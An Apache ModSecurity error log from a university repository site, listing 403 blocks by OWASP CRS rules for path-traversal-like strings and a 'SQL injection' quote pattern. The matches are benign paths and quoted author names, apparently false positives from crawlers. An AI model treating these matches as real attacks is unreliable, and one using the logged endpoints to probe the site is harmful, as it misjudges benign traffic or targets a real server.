[Mon Aug 28 20:37:19.792272 2023] [:error] [pid 51958] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SK Ngajar_Dr.Sally Octaviana S,S,T.,M.T._Genap 2022-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyjD8Co-f0AAMr2aWIAAAAP"]
[Mon Aug 28 20:37:57.330961 2023] [:error] [pid 51939] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//4. JATIT 2019-Implementation of risk.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyjNcCo-f0AAMrjIXcAAAAE"]
[Mon Aug 28 20:38:32.358542 2023] [:error] [pid 51976] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//4. JATIT 2019-Implementation of risk.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyjWMCo-f0AAMsIipYAAAAZ"]
[Mon Aug 28 20:44:46.840814 2023] [:error] [pid 52291] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SK Ngajar_Dr.Sally Octaviana S,S,T.,M.T._Genap 2022-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOykzsCo-f0AAMxDuPEAAAAS"]
[Mon Aug 28 23:17:35.453627 2023] [:error] [pid 54439] [client 47.128.24.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_10._The_Effect_of_Proportional_Recruitment_in_the_Solution_of_a.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOzIn8Co-f0AANSnKo4AAAAH"]
[Tue Aug 29 00:58:15.813357 2023] [:error] [pid 56957] [client 47.128.16.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Muchamad Naseer\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzgN8Co-f0AAN59CdQAAAAB"]
[Tue Aug 29 02:22:18.942443 2023] [:error] [pid 57729] [client 47.128.28.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Yayan Kurniawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzz6sCo-f0AAOGBMwMAAAAc"]
[Tue Aug 29 02:56:51.327834 2023] [:error] [pid 58143] [client 40.77.167.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Lutfi Kusuma Mahdi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz8A8Co-f0AAOMfdvAAAAAE"]
[Tue Aug 29 06:12:02.850387 2023] [:error] [pid 60351] [client 40.77.167.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22aplikasi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0pwsCo-f0AAOu-YboAAAAR"]
[Tue Aug 29 06:44:36.311202 2023] [:error] [pid 60769] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Riki Rizkiansyah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0xZMCo-f0AAO1hRAcAAAAT"]
[Tue Aug 29 11:07:30.307100 2023] [:error] [pid 65493] [client 52.167.144.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Proximity kapasitif Autonics CR30-15DN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1vAsCo-f0AAP-V9l8AAAAC"]
[Tue Aug 29 11:59:58.876896 2023] [:error] [pid 2846] [client 47.128.24.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Identifikasi risiko\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO17TsCo-f0AAAseq0AAAAAi"]
[Tue Aug 29 14:44:05.775755 2023] [:error] [pid 6538] [client 47.128.16.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22HIRARCH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2hxcCo-f0AABmKv8MAAAAN"]
[Mon Aug 28 06:43:33.880474 2023] [:error] [pid 37313] [client 47.128.17.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvfpcCo-f0AAJHB3HgAAAAD"]
[Mon Aug 28 06:43:34.072972 2023] [:error] [pid 37313] [client 47.128.17.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvfpsCo-f0AAJHB3HkAAAAD"]
[Mon Aug 28 06:44:08.427345 2023] [:error] [pid 37421] [client 47.128.31.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Xu,  Jing\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvfyMCo-f0AAJIt718AAAAW"]
[Mon Aug 28 06:50:35.528130 2023] [:error] [pid 37420] [client 47.128.27.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22STRATEGIC BUSINESS MODELS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvhS8Co-f0AAJIsPxgAAAAV"]
[Mon Aug 28 06:51:16.988575 2023] [:error] [pid 37416] [client 47.128.22.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Model Pembelajaran Project, Activity, Cooperative \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvhdMCo-f0AAJIoaGYAAAAR"]
[Mon Aug 28 06:58:17.999617 2023] [:error] [pid 37312] [client 47.128.18.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hui Chen\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjGcCo-f0AAJHAkvQAAAAY"]
[Mon Aug 28 06:59:16.292739 2023] [:error] [pid 37416] [client 47.128.16.250] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ausiello, Giorgio\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjVMCo-f0AAJIoa9sAAAAR"]
[Mon Aug 28 06:59:54.905617 2023] [:error] [pid 37313] [client 47.128.31.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Cimato, Stelvio\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjesCo-f0AAJHB4s4AAAAD"]
[Mon Aug 28 07:01:03.170030 2023] [:error] [pid 37312] [client 47.128.28.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bon, Jan van\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjv8Co-f0AAJHAkvoAAAAY"]
[Mon Aug 28 07:04:57.245755 2023] [:error] [pid 37465] [client 47.128.22.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Endpoint_security.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvkqcCo-f0AAJJZaZEAAAAE"]
[Mon Aug 28 07:07:48.399989 2023] [:error] [pid 37401] [client 47.128.29.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DUHIGG, CHARLES\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvlVMCo-f0AAJIZSlEAAAAF"]
[Mon Aug 28 07:11:39.870116 2023] [:error] [pid 37574] [client 47.128.23.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Goggins, Sean P\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvmO8Co-f0AAJLG-foAAAAI"]
[Mon Aug 28 07:17:38.300093 2023] [:error] [pid 37618] [client 47.128.24.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Asep Hidayat, Drs., M.Pd.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnosCo-f0AAJLyEYgAAAAH"]
[Mon Aug 28 07:24:35.411823 2023] [:error] [pid 37758] [client 47.128.28.217] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mevarech,  Zemira R\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvpQ8Co-f0AAJN@77oAAAAE"]
[Mon Aug 28 07:33:26.563089 2023] [:error] [pid 37803] [client 157.55.39.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22CHANGE AND CONTINUITY MANAGEMENT IN THE PUBLIC SEC\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvrVsCo-f0AAJOr9kkAAAAL"]
[Mon Aug 28 07:38:05.110857 2023] [:error] [pid 37882] [client 47.128.30.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22FARZANA QUOQUAB\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvsbcCo-f0AAJP6BJ8AAAAM"]
[Mon Aug 28 07:41:38.557708 2023] [:error] [pid 37918] [client 47.128.26.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Wang, Cheng-Xiang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvtQsCo-f0AAJQeRgAAAAAP"]
